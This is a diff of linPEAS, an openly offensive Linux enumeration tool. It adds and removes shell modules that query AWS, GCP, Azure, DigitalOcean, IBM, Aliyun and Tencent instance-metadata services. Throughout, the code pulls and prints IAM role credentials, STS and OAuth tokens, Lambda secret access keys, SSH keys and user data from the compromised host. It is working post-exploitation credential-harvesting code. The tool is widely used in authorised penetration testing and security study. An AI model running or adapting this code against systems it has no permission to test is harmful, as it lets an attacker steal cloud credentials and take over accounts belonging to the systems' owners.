+            echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
+            echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
+            echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
+            echo "  ==============  "
+        done
+    fi
+fi
+
+
+if [ "$is_aws_ecs" = "Yes" ]; then
+    print_2title "AWS ECS Enumeration"
+    
+    aws_ecs_req=""
+    if [ "$(command -v curl)" ]; then
+        aws_ecs_req='curl -s -f'
+    elif [ "$(command -v wget)" ]; then
+        aws_ecs_req='wget -q -O -'
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+
+    if [ "$aws_ecs_metadata_uri" ]; then
+        print_3title "Container Info"
+        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
+        echo ""
+        
+        print_3title "Task Info"
+        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
+        echo ""
+    else
+        echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
+    fi
+
+    if [ "$aws_ecs_service_account_uri" ]; then
+        print_3title "IAM Role"
+        exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
+        echo ""
+    else
+        echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
+    fi
+fi
+
+if [ "$is_aws_ec2" = "Yes" ]; then
+    print_2title "AWS EC2 Enumeration"
+    
+    HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
+    URL="http://169.254.169.254/latest/meta-data"
+    
+    aws_req=""
+    if [ "$(command -v curl)" ]; then
+        aws_req="curl -s -f -H '$HEADER'"
+    elif [ "$(command -v wget)" ]; then
+        aws_req="wget -q -O - -H '$HEADER'"
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+  
+    if [ "$aws_req" ]; then
+        printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
+        printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
+        printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
+        printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
+        printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
+        printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
+
+        echo ""
+        print_3title "Account Info"
+        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
+
+        echo ""
+        print_3title "Network Info"
+        for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 
+          echo "Mac: $mac"
+          printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
+          printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
+          printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
+          echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
+          printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
+          echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
+          printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
+          echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
+          echo ""
+        done
+
+        echo ""
+        print_3title "IAM Role"
+        exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
+        for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 
+          echo "Role: $role"
+          exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
+          echo ""
+        done
+        
+        echo ""
+        print_3title "User Data"
+        eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
+        
+        echo ""
+        echo "EC2 Security Credentials"
+        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
+        
+        print_3title "SSM Runnig"
+        ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
+    fi
+fi
+
+if [ "$is_aws_lambda" = "Yes" ]; then
+  print_2title "AWS Lambda Enumeration"
+  printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
+  printf "Region: "; env | grep AWS_REGION
+  printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
+  printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
+  printf "Session token: "; env | grep AWS_SESSION_TOKEN
+  printf "Security token: "; env | grep AWS_SECURITY_TOKEN
+  printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
+  printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
+fi
+
+if [ "$is_aws_codebuild" = "Yes" ]; then
+  print_2title "AWS Codebuild Enumeration"
+
+  aws_req=""
+  if [ "$(command -v curl)" ]; then
+      aws_req="curl -s -f"
+  elif [ "$(command -v wget)" ]; then
+      aws_req="wget -q -O -"
+  else 
+      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+      echo "The addresses are in /codebuild/output/tmp/env.sh"
+  fi
+
+  if [ "$aws_req" ]; then
+    print_3title "Credentials"
+    CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
+    URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
+    exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
+
+    print_3title "Container Info"
+    METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
+    exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
+  fi
+fi
+
+if [ "$is_do" = "Yes" ]; then
+  print_2title "DO Droplet Enumeration"
+
+  do_req=""
+  if [ "$(command -v curl)" ]; then
+      do_req='curl -s -f '
+  elif [ "$(command -v wget)" ]; then
+      do_req='wget -q -O - '
+  else 
+      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+  fi
+
+  if [ "$do_req" ]; then
+    URL="http://169.254.169.254/metadata"
+    printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
+    printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
+    printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
+    printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
+    printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
+    printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
+    printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
+    printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
+    printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
+    printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
+  fi
+fi
+
+if [ "$is_ibm_vm" = "Yes" ]; then
+  print_2title "IBM Cloud Enumeration"
+
+  if ! [ "$IBM_TOKEN" ]; then
+    echo "Couldn't get the metdata token:("
+
+  else
+    TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
+    ACCEPT_HEADER="Accept: application/json"
+    URL="http://169.254.169.254/latest/meta-data"
+    
+    ibm_req=""
+    if [ "$(command -v curl)" ]; then
+        ibm_req="curl -s -f -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
+    elif [ "$(command -v wget)" ]; then
+        ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+
+    if [ "$ibm_req" ]; then
+      print_3title "Instance Details"
+      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
+
+      print_3title "Keys and User data"
+      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
+      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
+
+      print_3title "Placement Groups"
+      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
+
+      print_3title "IAM credentials"
+      exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
+    fi
+  fi
+
+fi
+
+if [ "$is_az_vm" = "Yes" ]; then
+  print_2title "Azure VM Enumeration"
+
+  HEADER="Metadata:true"
+  URL="http://169.254.169.254/metadata"
+  API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
+  
+  az_req=""
+  if [ "$(command -v curl)" ]; then
+      az_req="curl -s -f -H '$HEADER'"
+  elif [ "$(command -v wget)" ]; then
+      az_req="wget -q -O - -H '$HEADER'"
+  else 
+      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+  fi
+
+  if [ "$az_req" ]; then
+    print_3title "Instance details"
+    exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
+
+    print_3title "Load Balancer details"
+    exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
+
+    print_3title "Management token"
+    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
+
+    print_3title "Graph token"
+    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
+    
+    print_3title "Vault token"
+    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
+
+    print_3title "Storage token"
+    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
+  fi
+fi
+
+if [ "$check_az_app" = "Yes" ]; then
+  print_2title "Azure App Service Enumeration"
+  echo "I haven't tested this one, if it doesn't work, please send a PR fixing and adding functionality :)"
+
+  HEADER="secret:$IDENTITY_HEADER"
+
+  az_req=""
+  if [ "$(command -v curl)" ]; then
+      az_req="curl -s -f -H '$HEADER'"
+  elif [ "$(command -v wget)" ]; then
+      az_req="wget -q -O - -H '$HEADER'"
+  else 
+      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+  fi
+
+  if [ "$az_req" ]; then
+    print_3title "Management token"
+    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
+
+    print_3title "Graph token"
+    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
+    
+    print_3title "Vault token"
+    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
+
+    print_3title "Storage token"
+    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/10_Azure_automation_account.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/10_Azure_automation_account.sh
@ -1,46 +0,0 @@
-# Title: Cloud - Azure Automation Account
-# ID: CL_Azure_automation_account
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Azure Automation Account Service Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_az_automation_acc, exec_with_jq, print_2title, print_3title
-# Global Variables: $is_az_automation_acc,
-# Initial Functions: check_az_automation_acc
-# Generated Global Variables: $API_VERSION, $HEADER, $az_req
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp
-
-if [ "$is_az_automation_acc" = "Yes" ]; then
-  print_2title "Azure Automation Account Service Enumeration"
-
-  HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER"
-
-  az_req=""
-  if [ "$(command -v curl || echo -n '')" ]; then
-      az_req="curl -s -f -L -H '$HEADER'"
-  elif [ "$(command -v wget || echo -n '')" ]; then
-      az_req="wget -q -O - --header '$HEADER'"
-  else 
-      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-  fi
-
-  if [ "$az_req" ]; then
-    print_3title "Management token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
-    echo
-    print_3title "Graph token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
-    echo
-    print_3title "Vault token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
-    echo
-    print_3title "Storage token"
-    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
-  fi
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/11_DO_Droplet.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/11_DO_Droplet.sh
@ -1,42 +0,0 @@
-# Title: Cloud - DO Droplet
-# ID: CL_DO_Droplet
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: DO Droplet Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_do, print_2title
-# Global Variables: $is_do
-# Initial Functions: check_do
-# Generated Global Variables: $do_req, $URL
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$is_do" = "Yes" ]; then
-  print_2title "DO Droplet Enumeration"
-
-  do_req=""
-  if [ "$(command -v curl || echo -n '')" ]; then
-      do_req='curl -s -f -L '
-  elif [ "$(command -v wget || echo -n '')" ]; then
-      do_req='wget -q -O - '
-  else 
-      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-  fi
-
-  if [ "$do_req" ]; then
-    URL="http://169.254.169.254/metadata"
-    printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
-    printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
-    printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
-    printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
-    printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
-    printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
-    printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
-    printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
-    printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
-    printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
-  fi
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/13_Ali_Cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/13_Ali_Cloud.sh
@ -1,98 +0,0 @@
-# Title: Cloud - Ali Cloud
-# ID: CL_Ali_Cloud
-# Author: Esonhugh
-# Last Update: 22-01-2024
-# Description: Ali Cloud Platform Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title, print_info
-# Global Variables: $is_aliyun_ecs
-# Initial Functions: check_aliyun_ecs
-# Generated Global Variables: $aliyun_req, $aliyun_token, $i_hostname, $i_instance_id, $i_instance_name, $i_instance_type, $i_aliyun_owner_account, $i_region_id, $i_zone_id, $i_pub_ipv4, $i_priv_ipv4, $net_dns, $mac, $sa, $key
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-
-if [ "$is_aliyun_ecs" = "Yes" ]; then
-  aliyun_req=""
-  aliyun_token=""
-  if [ "$(command -v curl)" ]; then 
-    aliyun_token=$(curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
-    aliyun_req='curl -s -f -L -H "X-aliyun-ecs-metadata-token: $aliyun_token"'
-  elif [ "$(command -v wget)" ]; then
-    aliyun_token=$(wget -q -O - --method PUT "http://100.100.100.200/latest/api/token" --header "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
-    aliyun_req='wget -q -O --header "X-aliyun-ecs-metadata-token: $aliyun_token"'
-  else 
-    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-  fi
-
-  if [ "$aliyun_token" ]; then
-    print_2title "Aliyun ECS Enumeration"
-    print_info "https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata"
-
-    echo ""
-    print_3title "Instance Info"
-    i_hostname=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/hostname)
-    [ "$i_hostname" ] && echo "Hostname: $i_hostname"
-    i_instance_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance-id)
-    [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
-    # no dup of hostname if in ACK it possibly leaks aliyun cluster service ClusterId
-    i_instance_name=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-name)
-    [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
-    i_instance_type=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-type)
-    [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
-    i_aliyun_owner_account=$(eval $aliyun_req http://i00.100.100.200/latest/meta-data/owner-account-id)
-    [ "$i_aliyun_owner_account" ] && echo "Aliyun Owner Account: $i_aliyun_owner_account"
-    i_region_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/region-id)
-    [ "$i_region_id" ] && echo "Region ID: $i_region_id"
-    i_zone_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/zone-id)
-    [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
-
-    echo ""
-    print_3title "Network Info"
-    i_pub_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/public-ipv4)
-    [ "$i_pub_ipv4" ] && echo "Public IPv4: $i_pub_ipv4"
-    i_priv_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/private-ipv4)
-    [ "$i_priv_ipv4" ] && echo "Private IPv4: $i_priv_ipv4"
-    net_dns=$(eval $aliyun_req  http://100.100.100.200/latest/meta-data/dns-conf/nameservers)
-    [ "$net_dns" ] && echo "DNS: $net_dns"
-    
-    echo "========"
-    for mac in $(eval $aliyun_req  http://100.100.100.200/latest/meta-data/network/interfaces/macs/); do
-      echo "  Mac: $mac"
-      echo "  Mac interface id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/network-interface-id)
-      echo "  Mac netmask: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/netmask)
-      echo "  Mac vpc id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-id)
-      echo "  Mac vpc cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-cidr-block)
-      echo "  Mac vpc cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-ipv6-cidr-blocks)
-      echo "  Mac vswitch id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-id)
-      echo "  Mac vswitch cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-cidr-block)
-      echo "  Mac vswitch cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-ipv6-cidr-block)
-      echo "  Mac private ips: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/private-ipv4s)
-      echo "  Mac private ips (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6s)
-      echo "  Mac gateway: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/gateway)
-      echo "  Mac gateway (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6-gateway)
-      echo "======="
-    done
-
-    echo ""
-    print_3title "Service account "
-    for sa in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/"); do 
-      echo "  Name: $sa"
-      echo "  STS Token: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/$sa")
-      echo "  =============="
-    done
-
-    echo ""
-    print_3title "Possbile admin ssh Public keys"
-    for key in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/"); do
-      echo "  Name: $key"
-      echo "  Key: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/${key}openssh-key")
-      echo "  =============="
-    done
-
-
-  fi
-fi
-
--- a/linPEAS/builder/linpeas_parts/3_cloud/14_IBM_Cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/14_IBM_Cloud.sh
@ -1,52 +0,0 @@
-# Title: Cloud - IBM Cloud
-# ID: CL_IBM_Cloud
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: IBM Cloud Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_ibm_vm, print_2title, print_3title
-# Global Variables: $IBM_TOKEN, $is_ibm_vm
-# Initial Functions: check_ibm_vm
-# Generated Global Variables: $TOKEN_HEADER, $ACCEPT_HEADER, $URL, $ibm_req
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$is_ibm_vm" = "Yes" ]; then
-  print_2title "IBM Cloud Enumeration"
-
-  if ! [ "$IBM_TOKEN" ]; then
-    echo "Couldn't get the metadata token:("
-
-  else
-    TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
-    ACCEPT_HEADER="Accept: application/json"
-    URL="http://169.254.169.254/latest/meta-data"
-    
-    ibm_req=""
-    if [ "$(command -v curl || echo -n '')" ]; then
-        ibm_req="curl -s -f -L -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
-    elif [ "$(command -v wget || echo -n '')" ]; then
-        ibm_req="wget -q -O - --header '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
-    else 
-        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-    fi
-
-    if [ "$ibm_req" ]; then
-      print_3title "Instance Details"
-      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
-
-      print_3title "Keys and User data"
-      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
-      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
-
-      print_3title "Placement Groups"
-      exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
-
-      print_3title "IAM credentials"
-      exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
-    fi
-  fi
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/15_Tencent_Cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/15_Tencent_Cloud.sh
@ -1,88 +0,0 @@
-# Title: Cloud - Tencent Cloud
-# ID: CL_Tencent_Cloud
-# Author: Shadowabi
-# Last Update: 22-01-2024
-# Description: Tencent Cloud Platform Enumeration
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title, print_info
-# Global Variables: $is_tencent_cvm
-# Initial Functions: check_tencent_cvm
-# Generated Global Variables: $tencent_req, $i_tencent_owner_account, $i_hostname, $i_instance_id, $i_instance_name, $i_instance_type, $i_region_id, $i_zone_id, $mac_tencent, $lipv4, $sa_tencent, $key_tencent
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$is_tencent_cvm" = "Yes" ]; then
-  tencent_req=""
-  if [ "$(command -v curl)" ]; then 
-    tencent_req='curl --connect-timeout 2 -sfkG'
-  elif [ "$(command -v wget)" ]; then
-    tencent_req='wget -q --timeout 2 --tries 1  -O -'
-  else 
-    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-  fi
-
-  
-    print_2title "Tencent CVM Enumeration"
-    print_info "https://cloud.tencent.com/document/product/213/4934"
-    # Todo: print_info "Hacktricks Documents needs to be updated"
-
-    echo ""
-    print_3title "Instance Info"
-    i_tencent_owner_account=$(eval $tencent_req http://169.254.0.23/latest/meta-data/app-id)
-    [ "$i_tencent_owner_account" ] && echo "Tencent Owner Account: $i_tencent_owner_account"
-    i_hostname=$(eval $tencent_req http://169.254.0.23/latest/meta-data/hostname)
-    [ "$i_hostname" ] && echo "Hostname: $i_hostname"
-    i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-id)
-    [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
-    i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/uuid)
-    [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
-    i_instance_name=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-name)
-    [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
-    i_instance_type=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance/instance-type)
-    [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
-    i_region_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/region)
-    [ "$i_region_id" ] && echo "Region ID: $i_region_id"
-    i_zone_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/zone)
-    [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
-
-    echo ""
-    print_3title "Network Info"
-    for mac_tencent in $(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/); do
-      echo "  Mac: $mac_tencent"
-      echo "  Primary IPv4: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/primary-local-ipv4)
-      echo "  Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/public-ipv4s)
-      echo "  Mac vpc id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/vpc-id)
-      echo "  Mac subnet id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/subnet-id)
-      
-      for lipv4 in $(eval $tencent_req  http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s); do
-        echo "  Mac local ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/local-ipv4)
-        echo "  Mac gateways: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/gateway)
-        echo "  Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4)
-        echo "  Mac public ips mode: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4-mode)
-        echo "  Mac subnet mask: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/subnet-mask)
-      done
-    echo "======="
-    done
-
-    echo ""
-    print_3title "Service account "
-    for sa_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/"); do 
-      echo "  Name: $sa_tencent"
-      echo "  STS Token: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/$sa_tencent")
-      echo "  =============="
-    done
-
-    echo ""
-    print_3title "Possbile admin ssh Public keys"
-    for key_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/"); do
-      echo "  Name: $key_tencent"
-      echo "  Key: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/${key_tencent}openssh-key")
-      echo "  =============="
-    done
-
-    echo ""
-    print_3title "User Data"
-    eval $tencent_req http://169.254.0.23/latest/user-data; echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/1_Check_if_in_cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/1_Check_if_in_cloud.sh
@ -1,34 +0,0 @@
-# Title: Cloud - Check if in cloud
-# ID: CL_Check_if_in_cloud
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check if the current system is inside a cloud environment
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_aws_codebuild, check_aws_ec2, check_aws_ecs, check_aws_lambda, check_az_app, check_az_vm, check_az_automation_acc, check_do, check_gcp, check_ibm_vm, check_tencent_cvm, print_list
-# Global Variables: $is_aws_codebuild, $is_aws_ecs, $is_aws_ec2, , $is_aws_lambda, $is_az_app, $is_az_automation_acc, $is_az_vm, $is_do, $is_gcp_vm, $is_gcp_function, $is_ibm_vm, $is_aws_ec2_beanstalk, $is_aliyun_ecs, $is_tencent_cvm
-# Initial Functions: check_gcp, check_aws_ecs, check_aws_ec2, check_aws_lambda, check_aws_codebuild, check_do, check_ibm_vm, check_az_vm, check_az_app, check_az_automation_acc, check_aliyun_ecs, check_tencent_cvm
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
